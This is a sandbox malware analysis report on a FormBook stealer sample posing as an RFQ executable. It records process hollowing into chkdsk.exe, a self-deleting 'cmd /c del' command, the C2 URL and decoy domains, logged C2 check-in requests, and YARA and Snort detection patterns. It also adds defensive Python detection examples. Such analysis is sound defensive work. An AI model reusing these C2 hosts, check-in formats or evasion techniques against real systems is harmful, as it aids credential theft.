
Windows Analysis Report RFQ-BCM 03122020.exe

Overview

General Information

Sample Name: RFQ-BCM 03122020.exe
Analysis ID: 435309
MD5: d3d5e6cafa8ca89384e56e6374a14203
SHA1: ba57aa266efd34ec5fe657c13ecda85e97ad5b5c
SHA256: 214910524a528bab8dae4a704169e20d9f2f92444df6e6a65d19decafd9f69b0
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • RFQ-BCM 03122020.exe (PID: 4628 cmdline: 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe' MD5: D3D5E6CAFA8CA89384E56E6374A14203)
    • RFQ-BCM 03122020.exe (PID: 5988 cmdline: 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe' MD5: D3D5E6CAFA8CA89384E56E6374A14203)
  • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • chkdsk.exe (PID: 3536 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
      • cmd.exe (PID: 4968 cmdline: /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
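The tree above shows the chain the injection signatures describe: the sample starts a second copy of itself (PID 4628 to 5988), explorer.exe then starts chkdsk.exe from SysWOW64 with no arguments, and that chkdsk.exe runs cmd.exe /c del against the original sample. The following is an added example, not part of the report and not a Sigma rule from the page, of how a detection engineer would express those three observations as checks over process-creation events. The events are constructed in the shape of the tree; PIDs, images and command lines follow it, while the parent PIDs of the two roots, the cmd.exe image path and the notepad.exe control event are assumptions.

```python
import re

SAMPLE = r"C:\Users\user\Desktop\RFQ-BCM 03122020.exe"

# Constructed process-creation events shaped like the process tree above. PIDs,
# images and command lines follow the tree; the parent PIDs of the two roots,
# the cmd.exe image path and the notepad.exe control event are assumptions.
EVENTS = [
    {"pid": 4628, "ppid": 1000, "image": SAMPLE, "cmdline": f"'{SAMPLE}'"},
    {"pid": 5988, "ppid": 4628, "image": SAMPLE, "cmdline": f"'{SAMPLE}'"},
    {"pid": 3472, "ppid": 1001, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 3536, "ppid": 3472, "image": r"C:\Windows\SysWOW64\chkdsk.exe",
     "cmdline": r"C:\Windows\SysWOW64\chkdsk.exe"},
    {"pid": 4968, "ppid": 3536, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"/c del '{SAMPLE}'"},
    {"pid": 4972, "ppid": 4968, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6000, "ppid": 3472, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\user\notes.txt"},   # benign control
]

DEL_RE = re.compile(r"(?i)/c\s+del\s+['\"]?([^'\"]+?)['\"]?\s*$")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def by_pid(events):
    return {e["pid"]: e for e in events}


def lineage(pid, index):
    """The process and its ancestors, nearest first, stopping at unknown PIDs."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(index[pid])
        pid = index[pid]["ppid"]
    return chain


def rule_self_spawn(events, index):
    """A non-Windows binary starting a second copy of itself: the shape the
    'creates a process in suspended mode' / hollowing signatures describe."""
    hits = []
    for e in events:
        parent = index.get(e["ppid"])
        if parent and parent["image"].lower() == e["image"].lower() \
                and not e["image"].lower().startswith("c:\\windows\\"):
            hits.append((e["pid"], "self_spawn", e["image"]))
    return hits


def rule_explorer_bare_syswow64(events, index):
    """explorer.exe launching a 32-bit system utility with no arguments. Weak
    on its own (a double-click looks the same); strong with the other two."""
    hits = []
    for e in events:
        parent = index.get(e["ppid"])
        if parent and basename(parent["image"]) == "explorer.exe" \
                and "\\syswow64\\" in e["image"].lower() \
                and e["cmdline"].strip().lower() == e["image"].lower():
            hits.append((e["pid"], "explorer_bare_syswow64_child", basename(e["image"])))
    return hits


def rule_delete_executed_sample(events, index):
    """cmd.exe /c del of a path that ran as a process in this tree, issued from
    a lineage that does not contain it: the dropper being cleaned up after its
    code has moved into another process."""
    images = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m or m.group(1).lower() not in images:
            continue
        target = m.group(1).lower()
        foreign = all(a["image"].lower() != target for a in lineage(e["pid"], index))
        label = "deletes_executed_sample_from_foreign_lineage" if foreign else "deletes_own_image"
        hits.append((e["pid"], label, target))
    return hits


def run_all(events):
    index = by_pid(events)
    findings = []
    for rule in (rule_self_spawn, rule_explorer_bare_syswow64, rule_delete_executed_sample):
        findings.extend(rule(events, index))
    return sorted(findings)


if __name__ == "__main__":
    for pid, rule, detail in run_all(EVENTS):
        print(f"PID {pid}: {rule} ({detail})")
```

The third check is the one worth keeping on its own: a deletion of an executable that already ran, issued from a process lineage that never contained it, only makes sense if the code kept running somewhere else. The explorer-to-SysWOW64 check is deliberately weak and should be combined with the others rather than alerted on alone.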

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jiltedowl.com/um8e/"], "decoy": ["theypretend.com", "hopeschildren.com", "kuly.cloud", "maniflexx.net", "bedtimesocietyblog.com", "spenglerwetlandpreserve.com", "unity-play.net", "bonap56.com", "consciencevc.com", "deluxeluxe.com", "officialjuliep.com", "cttrade.club", "quietflyt.com", "mcabspl.com", "lippocaritahotel.com", "tolanfilms.xyz", "momenaagro.com", "slingshotart.com", "thefoundershuddle.com", "mobilbaris.com", "castlerockbotanicals.com", "dautusim.com", "tolteca.club", "saddletaxweigh.info", "oxydiumcorp.com", "themiamadison.com", "888luckys.net", "brandsuggestion.com", "jusdra.com", "therios.net", "helpushelpothersstore.com", "pornometal.com", "whejvrehj.com", "ngzhaohern.com", "slaskie.pro", "heuristicadg.com", "angrybird23blog.com", "my-bmi.space", "lufral.com", "influenced-brands.com", "vicdux.life", "top1opp.com", "techiedrill.com", "sitedesing.com", "bigtittylesbians.com", "xspinworks14.com", "alturadesingfit.com", "venturivasiljevic.com", "yxsj.info", "yorkshirebridalmakeup.info", "shopinnocenceeyejai.com", "yinhangli.com", "tickimumm.com", "xn--939am40byoeizq.com", "customerservuce.com", "blendoriginal.com", "freelancebizquiz.com", "matjar-lik.com", "bellaxxocosmetics.com", "gxdazj.com", "findbriefmarken.com", "pubgevents1.com", "metis.network", "eternapure.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
2.2.RFQ-BCM 03122020.exe.2160000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.RFQ-BCM 03122020.exe.2160000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries not shown)
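
The rule matches in the two tables above list the exact byte sequences the community rules key on, and the offsets at which they were found in each dump. The following is an added example, not code from Joe Security, JPCERT/CC or yara-signator, that shows what those matches mean in practice: it scans a buffer for the same patterns and reports hits in the report's own `0x<offset>:$<name>` form, decodes the three `$sqlite3*` strings as `push imm32` instructions (opcode 0x68) to recover the 32-bit constants behind them, and checks `$sequence_0` for the RDTSC opcode (`0F 31`) that ties it to the "detect virtualization through RDTSC time measurements" signature listed above. The rule's string names attribute those constants to the sqlite3 API; the decoder only recovers the immediates, the attribution is the rule author's. The scanned buffer and the planted offsets are constructed, not taken from the sandbox.

```python
import struct

# Byte patterns copied from the rule matches above: $sequence_0 is from the
# yara-signator "Formbook_1" rule, the three $sqlite3* strings are from the
# JPCERT/CC "Formbook" rule. Report offsets are relative to each dump.
PATTERNS = {
    "sequence_0":  "03 C8 0F 31 2B C1 89 45 FC",  # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "sqlite3step": "68 34 1C 7B E1",              # push 0xE17B1C34
    "sqlite3text": "68 38 2A 90 C5",              # push 0xC5902A38
    "sqlite3blob": "68 53 D8 7F 8C",              # push 0x8C7FD853
}

RDTSC = bytes.fromhex("0F31")


def hex_pattern(text: str) -> bytes:
    """Turn a YARA-style hex string without wildcards into raw bytes."""
    return bytes.fromhex(text.replace(" ", ""))


def find_all(buf: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs in buf, ascending."""
    hits, pos = [], buf.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = buf.find(needle, pos + 1)
    return hits


def scan(buf: bytes, patterns=PATTERNS) -> dict:
    """Map each pattern name to the offsets where it matches; names with
    no hit are omitted, so an empty dict means nothing matched."""
    found = {}
    for name, text in patterns.items():
        hits = find_all(buf, hex_pattern(text))
        if hits:
            found[name] = hits
    return found


def push_imm32(pattern: bytes) -> int:
    """Decode a 5-byte 'push imm32' (opcode 0x68, little-endian immediate)
    and return the immediate. For the $sqlite3* strings this is the constant
    the rule name attributes to an sqlite3 API; it is not an address."""
    if len(pattern) != 5 or pattern[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", pattern[1:])[0]


def uses_rdtsc(pattern: bytes) -> bool:
    """True if the sequence contains the RDTSC opcode, which is what links
    $sequence_0 to the RDTSC timing signature in the list above."""
    return RDTSC in pattern


def build_sample_dump() -> bytes:
    """Constructed stand-in for a memory dump: zero filler with the patterns
    planted at known offsets. This is not data from the sandbox."""
    buf = bytearray(0x200)
    planted = {0x20: "sequence_0", 0x80: "sequence_0",
               0x100: "sqlite3step", 0x110: "sqlite3text", 0x120: "sqlite3blob"}
    for off, name in planted.items():
        pat = hex_pattern(PATTERNS[name])
        buf[off:off + len(pat)] = pat
    return bytes(buf)


def report(buf: bytes) -> list:
    """Lines in the report's own '0x<off>:$<name>: <hex>' form."""
    lines = []
    for name, offs in scan(buf).items():
        for off in offs:
            lines.append(f"0x{off:x}:${name}: {PATTERNS[name]}")
    return lines


if __name__ == "__main__":
    dump = build_sample_dump()
    for line in report(dump):
        print(line)
    for name in ("sqlite3step", "sqlite3text", "sqlite3blob"):
        print(f"{name}: push 0x{push_imm32(hex_pattern(PATTERNS[name])):08X}")
```

Two practical points follow from the decode. First, `$sequence_0` matching in a dump says the timing check is present, not that it fired; the sandbox's own RDTSC signature is the evidence that it ran. Second, a rule keyed on five-byte `push imm32` constants is robust against the packer (the unpacked 2.2 and 3.x regions match at different offsets with the same bytes) but breaks as soon as the constants are changed, so the sequence-based rule and the constant-based rule are worth running together, as the report does.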

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.jiltedowl.com/um8e/"], "decoy": ["theypretend.com", "hopeschildren.com", "kuly.cloud", "maniflexx.net", "bedtimesocietyblog.com", "spenglerwetlandpreserve.com", "unity-play.net", "bonap56.com", "consciencevc.com", "deluxeluxe.com", "officialjuliep.com", "cttrade.club", "quietflyt.com", "mcabspl.com", "lippocaritahotel.com", "tolanfilms.xyz", "momenaagro.com", "slingshotart.com", "thefoundershuddle.com", "mobilbaris.com", "castlerockbotanicals.com", "dautusim.com", "tolteca.club", "saddletaxweigh.info", "oxydiumcorp.com", "themiamadison.com", "888luckys.net", "brandsuggestion.com", "jusdra.com", "therios.net", "helpushelpothersstore.com", "pornometal.com", "whejvrehj.com", "ngzhaohern.com", "slaskie.pro", "heuristicadg.com", "angrybird23blog.com", "my-bmi.space", "lufral.com", "influenced-brands.com", "vicdux.life", "top1opp.com", "techiedrill.com", "sitedesing.com", "bigtittylesbians.com", "xspinworks14.com", "alturadesingfit.com", "venturivasiljevic.com", "yxsj.info", "yorkshirebridalmakeup.info", "shopinnocenceeyejai.com", "yinhangli.com", "tickimumm.com", "xn--939am40byoeizq.com", "customerservuce.com", "blendoriginal.com", "freelancebizquiz.com", "matjar-lik.com", "bellaxxocosmetics.com", "gxdazj.com", "findbriefmarken.com", "pubgevents1.com", "metis.network", "eternapure.net"]}
Multi AV Scanner detection for submitted file
Source: RFQ-BCM 03122020.exe | Virustotal: Detection: 20%
Source: RFQ-BCM 03122020.exe | ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match | File source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: RFQ-BCM 03122020.exe | Joe Sandbox ML: detected
Source: 13.2.chkdsk.exe.4675830.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.chkdsk.exe.5097960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: RFQ-BCM 03122020.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: chkdsk.pdbGCTL | source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb | source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: RFQ-BCM 03122020.exe, 00000002.00000003.250609113.00000000098A0000.00000004.00000001.sdmp, RFQ-BCM 03122020.exe, 00000003.00000002.305161536.0000000000B50000.00000040.00000001.sdmp, chkdsk.exe, 0000000D.00000002.518417672.0000000004B60000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: RFQ-BCM 03122020.exe, chkdsk.exe
Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe | Code function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe | Code function: 2_2_00405CD8 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe | Code function: 2_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 104.252.53.222:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 104.252.53.222:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 104.252.53.222:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.jiltedowl.com/um8e/
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg HTTP/1.1; Host: www.jiltedowl.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg HTTP/1.1; Host: www.slingshotart.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg HTTP/1.1; Host: www.venturivasiljevic.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=Xi9PH5iXPg7OqoK0h1gN6IvgnIc5gotQ/5tv039xv1j+fqecGtXMWbrdMdu22zA2SdJt&z6AhC6=4h0836-hg HTTP/1.1; Host: www.helpushelpothersstore.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg HTTP/1.1; Host: www.vicdux.life; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg HTTP/1.1; Host: www.lippocaritahotel.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg HTTP/1.1; Host: www.sitedesing.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg HTTP/1.1; Host: www.themiamadison.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg HTTP/1.1; Host: www.influenced-brands.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View | IP Address: 100.24.208.97
Source: Joe Sandbox View | IP Address: 192.0.78.24
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: unknown | DNS traffic detected: queries for: www.jiltedowl.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.21.0; Date: Wed, 16 Jun 2021 09:56:58 GMT; Content-Type: text/html; charset=iso-8859-1; Content-Length: 315; Connection: close
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: RFQ-BCM 03122020.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: RFQ-BCM 03122020.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | String found in binary or memory: http://sitedesing.com/404.html/index.xml
Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | String found in binary or memory: http://sitedesing.com/404/
Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | String found in binary or memory: http://sitedesing.com/images/Asset
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
